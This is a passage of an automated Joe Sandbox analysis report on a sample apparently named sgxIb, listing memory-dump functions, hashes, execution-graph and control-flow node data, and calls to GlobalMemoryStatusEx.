                                • Source File: 00000010.00000002.1554300793.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_13ed000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 74a34b1a13ee45594b414034a51c29cf7791606df5f705b497064d77fcf2824e
                                • Instruction ID: e23980a5dedae20fab238350c24faa9b92604ad1fb52c238f6618cf124d1802a
                                • Opcode Fuzzy Hash: 74a34b1a13ee45594b414034a51c29cf7791606df5f705b497064d77fcf2824e
                                • Instruction Fuzzy Hash: 65210475904344EFDB05DF94D9C8B26BBA5FB84328F24C5ADE8094B2D2C336D846CA62
                                Function 013ED1CF Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1554300793.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_13ed000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction ID: 39c30b0b0d6fbe90de010e547f742433f399e278772578f5b1224a0041320ef4
                                • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction Fuzzy Hash: EC11BB75504280DFCB02CF54C5C4B15BBB1FB84228F28C6AAD8494B696C33AD44ACB61
                                Function 013ED017 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1554300793.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_13ed000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction ID: 96dea07d7319bd1b7a23a4f6d48e33b344e98e261c89a47abd0136f58b5e1974
                                • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction Fuzzy Hash: B5119075504380DFDB16CF54D5C4B15FFA1FB44318F28C6AAD8494B696C33AD84ACB61
                                Function 013DD731 Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1554218649.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_13dd000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bf4240048954301c411da6cc83e71d5e3bed13806c29c53a1d726461927e2c90
                                • Instruction ID: e4e3dc98b8010907682cbc4470cac0b20a8f4691e6a9c25b8afb280aeacd3bb2
                                • Opcode Fuzzy Hash: bf4240048954301c411da6cc83e71d5e3bed13806c29c53a1d726461927e2c90
                                • Instruction Fuzzy Hash: 2F01A2725043849BF7108EA5ED84B66FB9CEF45329F18C49AED094A2D2D6799840CAB2
                                Function 013DD730 Relevance: .0, Instructions: 36COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1554218649.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_13dd000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d7b0c70dceb4629058a49e13a91d2c670b0b5de035a7bc08d2a1d29cc4bc907b
                                • Instruction ID: 38b295ea6bb08a1c5b7854d6439829f406ca43f2b964b71696c7ee57ca83480b
                                • Opcode Fuzzy Hash: d7b0c70dceb4629058a49e13a91d2c670b0b5de035a7bc08d2a1d29cc4bc907b
                                • Instruction Fuzzy Hash: 8CF062724043849FE7118E1AD984B66FFD8EB85739F18C59AED484E2D2C3799844CAB1

                                Execution Graph

                                Execution Coverage:12.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:17
                                Total number of Limit Nodes:4
                                execution_graph 23837 3020848 23839 302084e 23837->23839 23838 302091b 23839->23838 23841 3021340 23839->23841 23843 3021343 23841->23843 23842 3021454 23842->23839 23843->23842 23845 30280f9 23843->23845 23847 3028103 23845->23847 23846 30281b9 23846->23843 23847->23846 23850 6ddfa88 23847->23850 23854 6ddfa78 23847->23854 23851 6ddfa9d 23850->23851 23852 6ddfcae 23851->23852 23853 6ddfcc9 GlobalMemoryStatusEx GlobalMemoryStatusEx 23851->23853 23852->23846 23853->23851 23855 6ddfa9d 23854->23855 23856 6ddfcae 23855->23856 23857 6ddfcc9 GlobalMemoryStatusEx GlobalMemoryStatusEx 23855->23857 23856->23846 23857->23855

                                Executed Functions

                                Function 06DD56B0 Relevance: 1.8, Strings: 1, Instructions: 594COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 619 6dd56b0-6dd56cd 620 6dd56cf-6dd56d2 619->620 621 6dd570a-6dd570d 620->621 622 6dd56d4-6dd56da 620->622 625 6dd570f-6dd5711 621->625 626 6dd5714-6dd5717 621->626 623 6dd56e0-6dd56e8 622->623 624 6dd5893-6dd58c3 622->624 623->624 627 6dd56ee-6dd56fb 623->627 641 6dd58cd-6dd58d0 624->641 625->626 628 6dd5719-6dd5726 626->628 629 6dd572b-6dd572e 626->629 627->624 631 6dd5701-6dd5705 627->631 628->629 632 6dd5741-6dd5744 629->632 633 6dd5730-6dd5736 629->633 631->621 634 6dd5746-6dd574d 632->634 635 6dd5752-6dd5755 632->635 637 6dd582d-6dd5837 633->637 638 6dd573c 633->638 634->635 639 6dd5768-6dd576b 635->639 640 6dd5757-6dd575d 635->640 646 6dd583e-6dd5840 637->646 638->632 647 6dd576d-6dd5776 639->647 648 6dd5777-6dd577a 639->648 642 6dd5820-6dd5823 640->642 643 6dd5763 640->643 644 6dd58f2-6dd58f5 641->644 645 6dd58d2-6dd58d6 641->645 649 6dd5828-6dd582b 642->649 643->639 653 6dd5909-6dd590c 644->653 654 6dd58f7-6dd58fe 644->654 650 6dd58dc-6dd58e4 645->650 651 6dd59c2-6dd59d0 645->651 652 6dd5845-6dd5848 646->652 655 6dd578d-6dd5790 648->655 656 6dd577c-6dd5782 648->656 649->637 649->652 650->651 657 6dd58ea-6dd58ed 650->657 676 6dd5a00-6dd5a01 651->676 677 6dd59d2-6dd59fc 651->677 658 6dd584a-6dd585c 652->658 659 6dd5861-6dd5864 652->659 663 6dd592e-6dd5931 653->663 664 6dd590e-6dd5912 653->664 660 6dd59ba-6dd59c1 654->660 661 6dd5904 654->661 665 6dd5798-6dd579b 655->665 666 6dd5792-6dd5793 655->666 656->622 662 6dd5788 656->662 657->644 658->659 659->633 668 6dd586a-6dd586d 659->668 661->653 662->655 672 6dd594f-6dd5952 663->672 673 6dd5933-6dd5937 663->673 664->651 669 6dd5918-6dd5920 664->669 670 6dd579d-6dd57a1 665->670 671 6dd57ac-6dd57af 665->671 666->665 668->656 679 6dd5873-6dd5875 668->679 669->651 680 6dd5926-6dd5929 669->680 681 6dd5885-6dd5892 670->681 682 6dd57a7 670->682 683 6dd57b9-6dd57bc 671->683 684 6dd57b1-6dd57b4 671->684 674 6dd596a-6dd596d 672->674 675 6dd5954-6dd5965 672->675 673->651 685 6dd593d-6dd5945 673->685 689 6dd596f-6dd5976 674->689 690 6dd5977-6dd597a 674->690 675->674 692 6dd5a0f-6dd5a12 676->692 693 6dd5a03-6dd5a0a 676->693 691 6dd59fe 677->691 694 6dd587c-6dd587f 679->694 695 6dd5877 679->695 680->663 682->671 687 6dd57be-6dd57dd 683->687 688 6dd57e2-6dd57e5 683->688 684->683 685->651 686 6dd5947-6dd594a 685->686 686->672 687->688 697 6dd57fb-6dd57fe 688->697 698 6dd57e7-6dd57f6 688->698 699 6dd597c-6dd5980 690->699 700 6dd5994-6dd5997 690->700 691->676 701 6dd5a18-6dd5bac 692->701 702 6dd5cfb-6dd5cfe 692->702 693->692 694->620 694->681 695->694 707 6dd581b-6dd581e 697->707 708 6dd5800-6dd5816 697->708 698->697 699->651 706 6dd5982-6dd598a 699->706 709 6dd5999-6dd59a3 700->709 710 6dd59a8-6dd59aa 700->710 770 6dd5ce5-6dd5cf8 701->770 771 6dd5bb2-6dd5bb9 701->771 704 6dd5d16-6dd5d19 702->704 705 6dd5d00-6dd5d13 702->705 715 6dd5d1b-6dd5d2c 704->715 716 6dd5d33-6dd5d36 704->716 706->651 714 6dd598c-6dd598f 706->714 707->642 707->649 708->707 709->710 711 6dd59ac 710->711 712 6dd59b1-6dd59b4 710->712 711->712 712->641 712->660 714->700 730 6dd5d2e 715->730 731 6dd5d7b-6dd5d82 715->731 718 6dd5d38-6dd5d49 716->718 719 6dd5d50-6dd5d53 716->719 728 6dd5d5e-6dd5d6f 718->728 733 6dd5d4b 718->733 719->701 724 6dd5d59-6dd5d5c 719->724 724->728 729 6dd5d76-6dd5d79 724->729 728->731 738 6dd5d71 728->738 729->731 734 6dd5d87-6dd5d8a 729->734 730->716 731->734 733->719 734->701 736 6dd5d90-6dd5d93 734->736 739 6dd5d95-6dd5da6 736->739 740 6dd5db1-6dd5db4 736->740 738->729 739->705 747 6dd5dac 739->747 741 6dd5dce-6dd5dd1 740->741 742 6dd5db6-6dd5dc7 740->742 745 6dd5ddb-6dd5ddd 741->745 746 6dd5dd3-6dd5dd8 741->746 742->731 752 6dd5dc9 742->752 749 6dd5ddf 745->749 750 6dd5de4-6dd5de7 745->750 746->745 747->740 749->750 750->691 753 6dd5ded-6dd5df6 750->753 752->741 772 6dd5c6d-6dd5c74 771->772 773 6dd5bbf-6dd5be2 771->773 772->770 774 6dd5c76-6dd5ca9 772->774 782 6dd5bea-6dd5bf2 773->782 786 6dd5cae-6dd5cdb 774->786 787 6dd5cab 774->787 783 6dd5bf4 782->783 784 6dd5bf7-6dd5c38 782->784 783->784 795 6dd5c3a-6dd5c4b 784->795 796 6dd5c50-6dd5c61 784->796 786->753 787->786 795->753 796->753
                                Strings
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: e6a2d9672ed1b9bcd2838c0c1a597c949bbb8694a0dfc78ba38c4c09610e05e3
                                • Instruction ID: 63bc8f1cb8dc5b4342f8f71e9f0784e79dc537fdc13b9596416dae1a796eb5f8
                                • Opcode Fuzzy Hash: e6a2d9672ed1b9bcd2838c0c1a597c949bbb8694a0dfc78ba38c4c09610e05e3
                                • Instruction Fuzzy Hash: A322B075E002149FDF64EBA8D4847AEBBB2FF85320F24856AD456AB340DB35DC45CBA0
                                Function 06DD6708 Relevance: .8, Instructions: 822COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f964aadacb29a4b2b0330a3e3f9d656540f85c83a0154cdab572f045afc7f31b
                                • Instruction ID: 7ce771baa7a62deb5949b8b9297102ebfc957f15119f17b9e5118bc43ef7e182
                                • Opcode Fuzzy Hash: f964aadacb29a4b2b0330a3e3f9d656540f85c83a0154cdab572f045afc7f31b
                                • Instruction Fuzzy Hash: 2A629C34E002449FDB54EB68D594AADBBF2FF88310F248569E806EB390DB35ED41CB90
                                Function 06DD3580 Relevance: .5, Instructions: 545COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2173 6dd3580-6dd35a1 2174 6dd35a3-6dd35a6 2173->2174 2175 6dd35ac-6dd35cb 2174->2175 2176 6dd3d47-6dd3d4a 2174->2176 2185 6dd35cd-6dd35d0 2175->2185 2186 6dd35e4-6dd35ee 2175->2186 2177 6dd3d4c-6dd3d6b 2176->2177 2178 6dd3d70-6dd3d72 2176->2178 2177->2178 2179 6dd3d79-6dd3d7c 2178->2179 2180 6dd3d74 2178->2180 2179->2174 2183 6dd3d82-6dd3d8b 2179->2183 2180->2179 2185->2186 2188 6dd35d2-6dd35e2 2185->2188 2191 6dd35f4-6dd3603 2186->2191 2188->2191 2302 6dd3605 call 6dd3d99 2191->2302 2303 6dd3605 call 6dd3da0 2191->2303 2192 6dd360a-6dd360f 2193 6dd361c-6dd38f9 2192->2193 2194 6dd3611-6dd3617 2192->2194 2215 6dd38ff-6dd39ae 2193->2215 2216 6dd3d39-6dd3d46 2193->2216 2194->2183 2225 6dd39d7 2215->2225 2226 6dd39b0-6dd39d5 2215->2226 2228 6dd39e0-6dd39f3 call 6dd316c 2225->2228 2226->2228 2231 6dd39f9-6dd3a1b call 6dd3178 2228->2231 2232 6dd3d20-6dd3d2c 2228->2232 2231->2232 2236 6dd3a21-6dd3a2b 2231->2236 2232->2215 2233 6dd3d32 2232->2233 2233->2216 2236->2232 2237 6dd3a31-6dd3a3c 2236->2237 2237->2232 2238 6dd3a42-6dd3b18 2237->2238 2250 6dd3b1a-6dd3b1c 2238->2250 2251 6dd3b26-6dd3b56 2238->2251 2250->2251 2255 6dd3b58-6dd3b5a 2251->2255 2256 6dd3b64-6dd3b70 2251->2256 2255->2256 2257 6dd3bd0-6dd3bd4 2256->2257 2258 6dd3b72-6dd3b76 2256->2258 2259 6dd3bda-6dd3c16 2257->2259 2260 6dd3d11-6dd3d1a 2257->2260 2258->2257 2261 6dd3b78-6dd3ba2 2258->2261 2273 6dd3c18-6dd3c1a 2259->2273 2274 6dd3c24-6dd3c32 2259->2274 2260->2232 2260->2238 2268 6dd3ba4-6dd3ba6 2261->2268 2269 6dd3bb0-6dd3bcd call 6dd3184 2261->2269 2268->2269 2269->2257 2273->2274 2276 6dd3c49-6dd3c54 2274->2276 2277 6dd3c34-6dd3c3f 2274->2277 2281 6dd3c6c-6dd3c7d 2276->2281 2282 6dd3c56-6dd3c5c 2276->2282 2277->2276 2280 6dd3c41 2277->2280 2280->2276 2286 6dd3c7f-6dd3c85 2281->2286 2287 6dd3c95-6dd3ca1 2281->2287 2283 6dd3c5e 2282->2283 2284 6dd3c60-6dd3c62 2282->2284 2283->2281 2284->2281 2288 6dd3c89-6dd3c8b 2286->2288 2289 6dd3c87 2286->2289 2291 6dd3cb9-6dd3d0a 2287->2291 2292 6dd3ca3-6dd3ca9 2287->2292 2288->2287 2289->2287 2291->2260 2293 6dd3cad-6dd3caf 2292->2293 2294 6dd3cab 2292->2294 2293->2291 2294->2291 2302->2192 2303->2192
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 74aaecb34d75c8a78806b54760e88a52a57815b43dbf73f1390a2af7eb9c5883
                                • Instruction ID: f63bd1098ce3f6cf32b1372911e0d30358e060431ec25405b6316ef93c34b9ca
                                • Opcode Fuzzy Hash: 74aaecb34d75c8a78806b54760e88a52a57815b43dbf73f1390a2af7eb9c5883
                                • Instruction Fuzzy Hash: 9B321C31E10719CFDB14EFA9C8906ADB7B1FF89300F518669D409AB250EF70A985CB91
                                Function 06DD7E98 Relevance: .5, Instructions: 475COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2304 6dd7e98-6dd7eb6 2305 6dd7eb8-6dd7ebb 2304->2305 2306 6dd7ebd-6dd7ed7 2305->2306 2307 6dd7edc-6dd7edf 2305->2307 2306->2307 2308 6dd7ef6-6dd7ef9 2307->2308 2309 6dd7ee1-6dd7eef 2307->2309 2310 6dd7f1c-6dd7f1f 2308->2310 2311 6dd7efb-6dd7f17 2308->2311 2316 6dd7f3e-6dd7f54 2309->2316 2317 6dd7ef1 2309->2317 2314 6dd7f2c-6dd7f2e 2310->2314 2315 6dd7f21-6dd7f2b 2310->2315 2311->2310 2319 6dd7f35-6dd7f38 2314->2319 2320 6dd7f30 2314->2320 2324 6dd816f-6dd8179 2316->2324 2325 6dd7f5a-6dd7f63 2316->2325 2317->2308 2319->2305 2319->2316 2320->2319 2326 6dd7f69-6dd7f86 2325->2326 2327 6dd817a-6dd81af 2325->2327 2334 6dd815c-6dd8169 2326->2334 2335 6dd7f8c-6dd7fb4 2326->2335 2330 6dd81b1-6dd81b4 2327->2330 2332 6dd83e9-6dd83ec 2330->2332 2333 6dd81ba-6dd81c9 2330->2333 2336 6dd840f-6dd8412 2332->2336 2337 6dd83ee-6dd840a 2332->2337 2345 6dd81e8-6dd822c 2333->2345 2346 6dd81cb-6dd81e6 2333->2346 2334->2324 2334->2325 2335->2334 2361 6dd7fba-6dd7fc3 2335->2361 2338 6dd84bd-6dd84bf 2336->2338 2339 6dd8418-6dd8424 2336->2339 2337->2336 2342 6dd84c6-6dd84c9 2338->2342 2343 6dd84c1 2338->2343 2347 6dd842f-6dd8431 2339->2347 2342->2330 2348 6dd84cf-6dd84d8 2342->2348 2343->2342 2355 6dd83bd-6dd83d3 2345->2355 2356 6dd8232-6dd8243 2345->2356 2346->2345 2352 6dd8449-6dd844d 2347->2352 2353 6dd8433-6dd8439 2347->2353 2359 6dd844f-6dd8459 2352->2359 2360 6dd845b 2352->2360 2357 6dd843d-6dd843f 2353->2357 2358 6dd843b 2353->2358 2355->2332 2370 6dd8249-6dd8266 2356->2370 2371 6dd83a8-6dd83b7 2356->2371 2357->2352 2358->2352 2363 6dd8460-6dd8462 2359->2363 2360->2363 2361->2327 2365 6dd7fc9-6dd7fe5 2361->2365 2367 6dd8464-6dd8467 2363->2367 2368 6dd8473-6dd84ac 2363->2368 2373 6dd7feb-6dd8015 2365->2373 2374 6dd814a-6dd8156 2365->2374 2367->2348 2368->2333 2387 6dd84b2-6dd84bc 2368->2387 2370->2371 2383 6dd826c-6dd8362 call 6dd66b8 2370->2383 2371->2355 2371->2356 2388 6dd801b-6dd8043 2373->2388 2389 6dd8140-6dd8145 2373->2389 2374->2334 2374->2361 2437 6dd8364-6dd836e 2383->2437 2438 6dd8370 2383->2438 2388->2389 2396 6dd8049-6dd8077 2388->2396 2389->2374 2396->2389 2401 6dd807d-6dd8086 2396->2401 2401->2389 2402 6dd808c-6dd80be 2401->2402 2410 6dd80c9-6dd80e5 2402->2410 2411 6dd80c0-6dd80c4 2402->2411 2410->2374 2414 6dd80e7-6dd813e call 6dd66b8 2410->2414 2411->2389 2413 6dd80c6 2411->2413 2413->2410 2414->2374 2439 6dd8375-6dd8377 2437->2439 2438->2439 2439->2371 2440 6dd8379-6dd837e 2439->2440 2441 6dd838c 2440->2441 2442 6dd8380-6dd838a 2440->2442 2443 6dd8391-6dd8393 2441->2443 2442->2443 2443->2371 2444 6dd8395-6dd83a1 2443->2444 2444->2371
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bde1258bc705db597e31ec9878638db90b374ffb6b948e18b2bc4305fc43c966
                                • Instruction ID: 6e8f2fba86083f72147ab0fe52271b756a37aa71ff9cc4925aef86eba9a7892c
                                • Opcode Fuzzy Hash: bde1258bc705db597e31ec9878638db90b374ffb6b948e18b2bc4305fc43c966
                                • Instruction Fuzzy Hash: 5F027C30B012158FDB55EF68D8946AEBBF2FF88310F158569D816AB390DB35EC46CB90
                                Function 0302ED70 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 799 302ed70-302ed8b 800 302edb5-302edcb 799->800 801 302ed8d-302edb4 799->801 824 302edcd call 302ed70 800->824 825 302edcd call 302ee58 800->825 804 302edd2-302edd4 805 302edd6-302edd9 804->805 806 302edda-302ee0f 804->806 811 302ee10-302ee39 806->811 814 302ee3b-302ee3e 811->814 815 302ee3f-302ee54 811->815 815->811 817 302ee56-302eecc GlobalMemoryStatusEx 815->817 820 302eed5-302eefd 817->820 821 302eece-302eed4 817->821 821->820 824->804 825->804
                                Memory Dump Source
                                • Source File: 00000013.00000002.1620076652.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_3020000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cc08e864dd900352c76ffd96def18f8dd992f7fd7546cc44bbcc2d3d061c236b
                                • Instruction ID: dee842e99948699f94f05cec8850a8d764591e54840f476fd01af265ad5673e4
                                • Opcode Fuzzy Hash: cc08e864dd900352c76ffd96def18f8dd992f7fd7546cc44bbcc2d3d061c236b
                                • Instruction Fuzzy Hash: 1F412272E143998FCB14DFB5D8042DABFF5AF89210F1986ABD408E7281DB749841CBE1
                                Function 0302EE58 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 826 302ee58-302eecc GlobalMemoryStatusEx 828 302eed5-302eefd 826->828 829 302eece-302eed4 826->829 829->828
                                APIs
                                • GlobalMemoryStatusEx.KERNELBASE ref: 0302EEBF
                                Memory Dump Source
                                • Source File: 00000013.00000002.1620076652.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_3020000_sgxIb.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID:
                                • API String ID: 1890195054-0
                                • Opcode ID: 5014baf1a7caa9e672333dc91c06f0c94a7639f411032696ad9addc409e919bc
                                • Instruction ID: e22017cb56d87065201f57f58bb885835787bfea682e9e646ba0042ce7b9395e
                                • Opcode Fuzzy Hash: 5014baf1a7caa9e672333dc91c06f0c94a7639f411032696ad9addc409e919bc
                                • Instruction Fuzzy Hash: 4411F3B1C1065A9BDB10CF9AC444BDEFBF4AF48320F15816AD818A7640D378A944CFA5
                                Function 06DDD070 Relevance: .8, Instructions: 802COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1266 6ddd070-6ddd08b 1267 6ddd08d-6ddd090 1266->1267 1268 6ddd0d9-6ddd0dc 1267->1268 1269 6ddd092-6ddd0a1 1267->1269 1270 6ddd0de-6ddd120 1268->1270 1271 6ddd125-6ddd128 1268->1271 1272 6ddd0b0-6ddd0bc 1269->1272 1273 6ddd0a3-6ddd0a8 1269->1273 1270->1271 1274 6ddd12a-6ddd12c 1271->1274 1275 6ddd137-6ddd13a 1271->1275 1276 6ddda8d-6dddac6 1272->1276 1277 6ddd0c2-6ddd0d4 1272->1277 1273->1272 1279 6ddd559 1274->1279 1280 6ddd132 1274->1280 1281 6ddd13c-6ddd141 1275->1281 1282 6ddd144-6ddd147 1275->1282 1289 6dddac8-6dddacb 1276->1289 1277->1268 1286 6ddd55c-6ddd568 1279->1286 1280->1275 1281->1282 1283 6ddd149-6ddd18b 1282->1283 1284 6ddd190-6ddd193 1282->1284 1283->1284 1291 6ddd1dc-6ddd1df 1284->1291 1292 6ddd195-6ddd1d7 1284->1292 1286->1269 1290 6ddd56e-6ddd85b 1286->1290 1294 6dddacd-6dddae9 1289->1294 1295 6dddaee-6dddaf1 1289->1295 1479 6ddd861-6ddd867 1290->1479 1480 6ddda82-6ddda8c 1290->1480 1296 6ddd228-6ddd22b 1291->1296 1297 6ddd1e1-6ddd223 1291->1297 1292->1291 1294->1295 1302 6dddb24-6dddb27 1295->1302 1303 6dddaf3-6dddb1f 1295->1303 1298 6ddd22d-6ddd26f 1296->1298 1299 6ddd274-6ddd277 1296->1299 1297->1296 1298->1299 1305 6ddd279-6ddd288 1299->1305 1306 6ddd2c0-6ddd2c3 1299->1306 1310 6dddb29 call 6dddbe5 1302->1310 1311 6dddb36-6dddb38 1302->1311 1303->1302 1315 6ddd28a-6ddd28f 1305->1315 1316 6ddd297-6ddd2a3 1305->1316 1320 6ddd2c5-6ddd2c7 1306->1320 1321 6ddd2d2-6ddd2d5 1306->1321 1331 6dddb2f-6dddb31 1310->1331 1313 6dddb3f-6dddb42 1311->1313 1314 6dddb3a 1311->1314 1313->1289 1322 6dddb44-6dddb53 1313->1322 1314->1313 1315->1316 1316->1276 1323 6ddd2a9-6ddd2bb 1316->1323 1324 6ddd2cd 1320->1324 1325 6ddd417-6ddd420 1320->1325 1326 6ddd2d7-6ddd2ed 1321->1326 1327 6ddd2f2-6ddd2f5 1321->1327 1351 6dddbba-6dddbcf 1322->1351 1352 6dddb55-6dddbb8 call 6dd66b8 1322->1352 1323->1306 1324->1321 1332 6ddd42f-6ddd43b 1325->1332 1333 6ddd422-6ddd427 1325->1333 1326->1327 1336 6ddd33e-6ddd341 1327->1336 1337 6ddd2f7-6ddd339 1327->1337 1331->1311 1340 6ddd54c-6ddd551 1332->1340 1341 6ddd441-6ddd455 1332->1341 1333->1332 1347 6ddd364-6ddd367 1336->1347 1348 6ddd343-6ddd35f 1336->1348 1337->1336 1340->1279 1341->1279 1365 6ddd45b-6ddd46d 1341->1365 1347->1286 1349 6ddd36d-6ddd370 1347->1349 1348->1347 1358 6ddd3b9-6ddd3bc 1349->1358 1359 6ddd372-6ddd3b4 1349->1359 1377 6dddbd0 1351->1377 1352->1351 1368 6ddd3be-6ddd400 1358->1368 1369 6ddd405-6ddd407 1358->1369 1359->1358 1386 6ddd46f-6ddd475 1365->1386 1387 6ddd491-6ddd493 1365->1387 1368->1369 1378 6ddd40e-6ddd411 1369->1378 1379 6ddd409 1369->1379 1377->1377 1378->1267 1378->1325 1379->1378 1390 6ddd479-6ddd485 1386->1390 1391 6ddd477 1386->1391 1397 6ddd49d-6ddd4a9 1387->1397 1395 6ddd487-6ddd48f 1390->1395 1391->1395 1395->1397 1408 6ddd4ab-6ddd4b5 1397->1408 1409 6ddd4b7 1397->1409 1412 6ddd4bc-6ddd4be 1408->1412 1409->1412 1412->1279 1415 6ddd4c4-6ddd4e0 call 6dd66b8 1412->1415 1424 6ddd4ef-6ddd4fb 1415->1424 1425 6ddd4e2-6ddd4e7 1415->1425 1424->1340 1426 6ddd4fd-6ddd54a 1424->1426 1425->1424 1426->1279 1481 6ddd869-6ddd86e 1479->1481 1482 6ddd876-6ddd87f 1479->1482 1481->1482 1482->1276 1483 6ddd885-6ddd898 1482->1483 1485 6ddd89e-6ddd8a4 1483->1485 1486 6ddda72-6ddda7c 1483->1486 1487 6ddd8a6-6ddd8ab 1485->1487 1488 6ddd8b3-6ddd8bc 1485->1488 1486->1479 1486->1480 1487->1488 1488->1276 1489 6ddd8c2-6ddd8e3 1488->1489 1492 6ddd8e5-6ddd8ea 1489->1492 1493 6ddd8f2-6ddd8fb 1489->1493 1492->1493 1493->1276 1494 6ddd901-6ddd91e 1493->1494 1494->1486 1497 6ddd924-6ddd92a 1494->1497 1497->1276 1498 6ddd930-6ddd949 1497->1498 1500 6ddd94f-6ddd976 1498->1500 1501 6ddda65-6ddda6c 1498->1501 1500->1276 1504 6ddd97c-6ddd986 1500->1504 1501->1486 1501->1497 1504->1276 1505 6ddd98c-6ddd9a3 1504->1505 1507 6ddd9a5-6ddd9b0 1505->1507 1508 6ddd9b2-6ddd9cd 1505->1508 1507->1508 1508->1501 1513 6ddd9d3-6ddd9ec call 6dd66b8 1508->1513 1517 6ddd9ee-6ddd9f3 1513->1517 1518 6ddd9fb-6ddda04 1513->1518 1517->1518 1518->1276 1519 6ddda0a-6ddda5e 1518->1519 1519->1501
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ac5d7f472565c1a2a2d9c445597c95a1891a467955d30aafd65d0f9cb9d096ad
                                • Instruction ID: 93ef260fb409bad2b09afdc1ee2d2a23a439a6e12a65b417c956cc0569f37003
                                • Opcode Fuzzy Hash: ac5d7f472565c1a2a2d9c445597c95a1891a467955d30aafd65d0f9cb9d096ad
                                • Instruction Fuzzy Hash: C0624870A003198FDB55EF68D480A5EBBB2FF88304B208A68D016AF355DB75EC46CB91
                                Function 06DDC2B0 Relevance: .6, Instructions: 642COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
